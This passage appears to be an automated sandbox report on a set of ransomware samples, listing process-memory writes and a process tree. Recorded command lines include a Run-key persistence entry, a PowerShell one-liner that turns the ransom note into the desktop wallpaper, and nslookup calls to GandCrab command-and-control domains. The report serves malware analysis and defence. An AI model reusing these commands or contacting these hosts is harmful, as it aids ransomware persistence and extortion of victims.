Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3036 wrote to memory of 3440 N/A C:\Windows\system32\taskmgr.exe C:\Windows\system32\taskmgr.exe
PID 3036 wrote to memory of 3440 N/A C:\Windows\system32\taskmgr.exe C:\Windows\system32\taskmgr.exe
PID 2356 wrote to memory of 1792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2356 wrote to memory of 1792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1792 wrote to memory of 64 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe
PID 1792 wrote to memory of 64 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe
PID 1792 wrote to memory of 64 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe
PID 1792 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe
PID 1792 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe
PID 1792 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe
PID 1792 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe
PID 1792 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe
PID 1792 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe
PID 1792 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe
PID 1792 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe
PID 1792 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe
PID 1792 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe
PID 1792 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe
PID 1792 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe
PID 64 wrote to memory of 1448 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe
PID 64 wrote to memory of 1448 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe
PID 1792 wrote to memory of 1216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe
PID 1792 wrote to memory of 1216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe
PID 1792 wrote to memory of 1216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe
PID 1792 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe
PID 1792 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe
PID 1792 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe
PID 1792 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe
PID 1792 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe
PID 1792 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe
PID 1792 wrote to memory of 4164 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe
PID 1792 wrote to memory of 4164 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe
PID 1792 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe
PID 1792 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe
PID 4164 wrote to memory of 4576 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe
PID 4164 wrote to memory of 4576 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe
PID 4576 wrote to memory of 1808 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 1808 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 4196 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 4196 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 5024 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe C:\Users\Admin\AppData\Roaming\Cntrlphse.exe
PID 2176 wrote to memory of 5024 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe C:\Users\Admin\AppData\Roaming\Cntrlphse.exe
PID 2176 wrote to memory of 5024 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe C:\Users\Admin\AppData\Roaming\Cntrlphse.exe
PID 928 wrote to memory of 3940 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 928 wrote to memory of 3940 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 928 wrote to memory of 3940 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
PID 1792 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe
PID 1792 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe
PID 4196 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4196 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1792 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe
PID 1792 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe
PID 1792 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe
PID 1792 wrote to memory of 7188 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe
PID 1792 wrote to memory of 7188 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe
PID 1792 wrote to memory of 7188 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe
PID 2068 wrote to memory of 7352 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 7352 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2068 wrote to memory of 7352 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 7188 wrote to memory of 8040 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe C:\Windows\SysWOW64\nslookup.exe
PID 7188 wrote to memory of 8040 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe C:\Windows\SysWOW64\nslookup.exe
PID 7188 wrote to memory of 8040 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe C:\Windows\SysWOW64\nslookup.exe
PID 7352 wrote to memory of 5504 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 7352 wrote to memory of 5504 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00476.7z

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00476.7z"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe

HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe

HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe

HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe

HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe

HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe

HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe"

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe

HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe

HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe

HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41~1\mouranth.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe""

C:\Users\Admin\AppData\Roaming\Cntrlphse.exe

"C:\Users\Admin\AppData\Roaming\Cntrlphse.exe"

C:\Users\Admin\AppData\Local\Temp\zbhnd.exe

"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe

HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe3cd19a757f7223bc2d49bbeb8c06dba44709dc12f60df6beb6ba29f0f60693.exe

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe"

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe

HEUR-Trojan-Ransom.Win32.Cryptor.gen-eb1d63ef65c7f04d361a4547c8601b8fa801fe47f7348fe84bca77e415eb7cf7.exe

C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe

HEUR-Trojan-Ransom.Win32.GandCrypt.pef-cc7943a212fbd7fa64825ca9255387e28a2666e9da1a6d5ad1929ad3f8ec8087.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1550356177.png /f

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\AppData\ChickiMiki Design.exe

"C:\Users\Admin\AppData\ChickiMiki Design.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\read_it.txt

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup emsisoft.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup gandcrab.bit dns1.soprodns.ru

C:\Windows\SysWOW64\nslookup.exe

nslookup nomoreransom.bit dns1.soprodns.ru

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00476\GET_YOUR_FILES_BACK.txt

C:\Windows\SysWOW64\nslookup.exe

